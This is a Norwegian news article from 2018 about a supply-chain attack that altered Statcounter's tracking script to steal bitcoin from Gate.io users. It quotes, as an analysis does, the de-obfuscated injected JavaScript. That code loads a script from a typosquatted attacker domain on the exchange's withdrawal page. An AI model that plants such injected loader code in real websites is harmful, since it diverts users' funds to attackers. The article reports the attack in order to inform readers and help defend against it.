SIKKERHET

Sofistikert angrep mot populær web­analyseplattform. Kan ha stjålet bitcoin fra intetanende brukere

Brukere av kryptovaluta-børsen Gate.io var målet for angrepet. (Illustrasjonsfoto)
Brukere av kryptovaluta-børsen Gate.io var målet for angrepet. (Illustrasjonsfoto) Foto: Colourbox/montasje
7. nov. 2018 - 11:35

Hackere har klart å kompromittere Statcounter, en populær webanalyse-plattform – i et forsøk på å stjele Bitcoin fra intetanende brukere av nettsider som benytter analyseplattformen. Heldigvis ser det ut til at det angrepet denne gangen var rettet mot kun ett nettsted.

Ifølge sikkerhetsforskere ved Eset har hackerne lykkes i å modifisere sporingsskriptet til Statcounter (statcounter.com/counter/counter.js). Dermed har de i praksis klart å injisere ondsinnet Javascript-kode i alle nettsider som benytter Statcounter. 

Statcounter brukes blant annet for å lage statistikk over hvem som besøker en nettside og bruken av nettsidene, i likhet med for eksempel Google Analytics. Analyseverktøyet brukes av rundt 2 millioner nettsteder over hele verden, og lager ifølge Eset statistikk basert på mer enn 10 milliarder sidevisninger i måneden. 

Rettet mot krypto-børs

Det at noen har klart å injisere ondsinnet Javascript-kode i et skript som brukes av flere millioner nettsteder, er ille nok – men som sagt virker det som om det er rettet mot kun ett nettsted – kryptobørsen Gate.io.

Den ondsinnede koden vil først sjekke om URL-en inneholder myaccount/withdraw/BTC. Hvis det er tilfelle, vil det legges til et nytt script-element på nettsiden, som inkluderer kode fra www.statconuter.com – legg merke til stavemåten, dette er et domene kjeltringene har kontroll over. Javascript-koden er komprimert på en slik måte at den – når den er plassert midt inne i Statcounters legitime kode – kan være lett å overse. Her er koden «pakket ut» i et mer lettlest format:

myselfloc = '' + document.location;
if (myselfloc.indexOf('myaccount/withdraw/BTC') > -1) {
	var ga = document.createElement('script');
	ga.src = 'https://www.statconuter.com/c.php';
	ga.setAttribute('async', 'true');
	document.documentElement.firstChild.appendChild(ga);
} 


Ifølge ekspertene hos Eset er det kun én eneste av de kjente kryptovaluta-børsene som har en URI som inneholder myaccount/withdraw/BTC, nemlig Gate.io – en ganske stor børs for kryptovaluta. Børsen håndterer så mye som 1,6 millioner dollar i bitcoin-transaksjoner hver dag. 

Angrepet fungerer videre ved at bitcoin-transaksjoner som intetanende brukere prøver å gjennomføre, vil bli omdirigert til «bitcoin-lommebøker» tilhørende angriperne. Det ble brukt mange ulike bitcoin-lommebøker til angrepet, og forskerne vet ikke hvor mye som kan ha blitt stjålet. 

«Selv om vi ikke vet hvor mange bitcoins som har blitt stjålet i dette angrepet, viser det hvor langt angriperne vil gå for å angripe en spesifikk nettside, i dette tilfellet en kryptovaluta-børs», skriver forskerne i sin rapport. 

Både Statcounter og Gate.io har blitt varslet om angrepet. Digi.no har sjekket, og det ser ut til at Statcounter nå har fjernet den ondsinnede koden i counter.js-skriptet. I en melding skriver Gate.io at de nå har sluttet å bruke Statcounter.

denne siden kan du lese hele rapporten, og detaljer om hvordan angrepet ble gjort.

Del
Kommentarer:
Du kan kommentere under fullt navn eller med kallenavn. Bruk BankID for automatisk oppretting av brukerkonto.